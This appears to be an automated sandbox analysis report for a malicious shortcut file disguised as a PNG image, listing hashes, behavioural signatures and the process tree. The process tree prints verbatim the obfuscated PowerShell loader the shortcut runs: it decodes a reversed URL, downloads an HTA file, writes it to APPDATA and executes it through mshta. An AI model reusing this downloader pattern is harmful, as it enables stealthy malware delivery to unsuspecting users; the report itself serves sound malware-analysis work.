Analysis
-
max time kernel
28s -
max time network
31s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
14/04/2023, 06:05
Static task
static1
Behavioral task
behavioral1
Sample
PHOTO-DRAWING-234196.png.lnk
Resource
win7-20230220-en
5 signatures
150 seconds
Behavioral task
behavioral2
Sample
PHOTO-DRAWING-234196.png.lnk
Resource
win10v2004-20230220-en
7 signatures
150 seconds
General
-
Target
PHOTO-DRAWING-234196.png.lnk
-
Size
3KB
-
MD5
6da902f8bd37a322553f8ca8d3578b7a
-
SHA1
266299e5a1bc0c4c33754e1df85e4b32b29886b7
-
SHA256
07fd6c66a7a9cfc1d67c140c7af9fbe1e842b0377cf1fe8859eff45f9aeee732
-
SHA512
64603b1c9bd0342ae62a8980e5fdad04c47e0368276bfc013537d745cd6f8d9133f682f183b0b375cd58fbe42d39961a7be3c89af4a7b8a288fb08986853e69e
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 520 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 520 powershell.exe -
Suspicious use of WriteProcessMemory 7 IoCs
description pid Process procid_target PID 1344 wrote to memory of 520 1344 cmd.exe 29 PID 1344 wrote to memory of 520 1344 cmd.exe 29 PID 1344 wrote to memory of 520 1344 cmd.exe 29 PID 520 wrote to memory of 1252 520 powershell.exe 30 PID 520 wrote to memory of 1252 520 powershell.exe 30 PID 520 wrote to memory of 1252 520 powershell.exe 30 PID 520 wrote to memory of 1252 520 powershell.exe 30
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\PHOTO-DRAWING-234196.png.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:1344 -
C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted $ProgressPreference = 0; function nvRClWiAJT($OnUPXhNfGyEh){$OnUPXhNfGyEh[$OnUPXhNfGyEh.Length..0] -join('')}; function sDjLksFILdkrdR($OnUPXhNfGyEh){ $vecsWHuXBHu = nvRClWiAJT $OnUPXhNfGyEh; for($TJuYrHOorcZu = 0;$TJuYrHOorcZu -lt $vecsWHuXBHu.Length;$TJuYrHOorcZu += 2){ try{$zRavFAQNJqOVxb += nvRClWiAJT $vecsWHuXBHu.Substring($TJuYrHOorcZu,2)} catch{$zRavFAQNJqOVxb += $vecsWHuXBHu.Substring($TJuYrHOorcZu,1)}};$zRavFAQNJqOVxb}; $NpzibtULgyi = sDjLksFILdkrdR 'ahte.plamexm/coe.plamex//s:tpht'; $cDkdhkGBtl = $env:APPDATA + '\' + ($NpzibtULgyi -split '/')[-1]; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $wbpiCTsGYi = wget $NpzibtULgyi -UseBasicParsing; [IO.File]::WriteAllText($cDkdhkGBtl, $wbpiCTsGYi); & $cDkdhkGBtl; sleep 3; rm $cDkdhkGBtl;2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:520 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\example.hta"3⤵
- Modifies Internet Explorer settings
PID:1252
-
-